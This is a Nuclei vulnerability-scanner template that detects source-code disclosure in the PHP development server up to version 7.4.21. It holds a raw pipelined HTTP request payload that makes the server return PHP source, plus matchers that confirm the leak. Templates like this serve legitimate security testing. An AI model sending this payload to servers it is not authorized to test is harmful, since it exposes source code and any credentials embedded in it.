nuclei-templates/http/misconfiguration/php-src-disclosure.yaml

44 lines
1.2 KiB
YAML

id: php-src-diclosure
info:
name: PHP Development Server <= 7.4.21 - Remote Source Disclosure
author: pdteam
severity: high
description: |
A source code disclosure vulnerability in a web server caused by improper handling of multiple requests in quick succession, leading to the server treating requested files as static files instead of executing scripts.
reference:
- https://blog.projectdiscovery.io/php-http-server-source-disclosure/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-540
metadata:
max-request: 2
tags: php,phpcli,diclosure,misconfig
http:
- raw:
- |+
GET / HTTP/1.1
Host: {{Hostname}}
GET /{{rand_base(3)}}.{{rand_base(2)}} HTTP/1.1
- |+
GET / HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: dsl
dsl:
- 'contains(body_1, "<?php")'
- '!contains(body_2, "<?php")'
condition: and
# digest: 4b0a00483046022100bb9d82791c84ea652fc9407918575931cfca15b34f017b80a18562a3195dbad5022100c291684cdcc0be1ae67c5af23e2ce997a73af55070848f2af180d22687929a18:922c64590222798bb761d5b6d8e72950